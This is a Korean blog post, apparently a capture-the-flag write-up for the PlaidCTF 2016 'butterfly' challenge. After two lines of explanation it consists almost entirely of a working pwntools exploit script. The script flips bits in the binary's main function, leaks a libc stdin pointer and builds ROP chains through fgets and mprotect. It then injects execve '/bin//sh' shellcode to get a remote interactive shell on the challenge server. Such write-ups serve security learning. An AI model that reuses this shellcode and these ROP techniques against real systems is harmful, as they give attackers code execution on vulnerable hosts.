본문 바로가기

Games/CTF

PlaidCTF 2016 butterfly

1bit flip 을 하게 해주는 문제.

main 함수에 명령어 몇개 바꿔서 ROP 하면됨.

hahah 님의 빠른 풀이전략을 듣고 익스코드 작성.



from pwn import *

import time

context.arch = 'amd64' # i386 / arm


SH = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

# recvuntil sendline, pack, recv, send

r = remote('butterfly.pwning.xxx', 9999)

#r = process(['stdbuf', '-o', '0', '-i', '0', './butterfly'])

raw_input('attach')

# start pwn.


# 0x48 -> 0x08

main = 0x400788

TARGET1 = '33571614'.ljust(40, ' ') #33571608 + ?

TARGET1 += pack(main)

print r.recv(1000)


r.sendline(TARGET1)


# create rdx gadget

TARGET22 = '33571616'.ljust(40, ' ')

TARGET22 += pack(main)

print r.recv(1000)

r.sendline(TARGET22)


# change fgets size

TARGET2 = '33570343'.ljust(40, ' ')

TARGET2 += pack(main)


print r.recv(1000)


r.sendline(TARGET2)


# jne -> je

TARGET32 = '33571544'.ljust(40, ' ')

'''

pattern 5fc3 found at 0x4008f3

POP RDI; RET;


   0x4007c8 <main+208>: pop    %rsi

   0x4007c9 <main+209>: pop    %r15

   0x4007cb <main+211>: pop    %rbp

   0x4007cc <main+212>: retq  


   0x00000000004007c6 <+206>: pop    %rdx

   0x00000000004007c7 <+207>: pop    %r14

   0x00000000004007c9 <+209>: pop    %r15

   0x00000000004007cb <+211>: pop    %rbp

   0x00000000004007cc <+212>: retq 

'''


fgets = 0x400640

puts = 0x400600

stdin_got = 0x600d30

poprdi = 0x4008f3

poprsi = 0x400866

poprdx = 0x400864

mprotect = 0x400660


raw_input('4')

# start full ROP. fgets

TARGET32 += pack(poprdi)

TARGET32 += pack(stdin_got)

TARGET32 += pack(puts)

TARGET32 += pack(main)

print r.recv(1000)

raw_input()

r.sendline(TARGET32)

raw_input()

leak = r.recv(1000)

print leak

stdin = int(leak.split('\n')[1][::-1].encode('hex'), 16)

print 'stdin : {0}'.format(hex(stdin))


TARGET3 = '33571864'.ljust(40, '#')


TARGET3 += pack(poprdi)

TARGET3 += pack(0x600800) # shellcode location

TARGET3 += pack(poprsi)

TARGET3 += pack(0x80)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(poprdx)

TARGET3 += pack(stdin)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(0)

TARGET3 += pack(fgets)

TARGET3 += pack(main)

r.sendline(TARGET3)

time.sleep(1)

r.sendline(SH)

time.sleep(.5)

print r.recv(1000)

time.sleep(.5)



TARGET4 = '33571864'.ljust(40, '#')

TARGET4 += pack(poprdi)

TARGET4 += pack(0x600000)

TARGET4 += pack(poprsi)

TARGET4 += pack(0x1000)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(poprdx)

TARGET4 += pack(7)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(0)

TARGET4 += pack(mprotect)

TARGET4 += pack(0x600800) # jump to shellcode

r.sendline(TARGET4)


# get shell?

r.interactive()


'Games > CTF' 카테고리의 다른 글

ASIS CTF 2016 books  (0) 2016.05.11
ASIS CTF 2016 feap  (0) 2016.05.11
PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19
CAMPCTF 2015 dkm  (0) 2015.11.19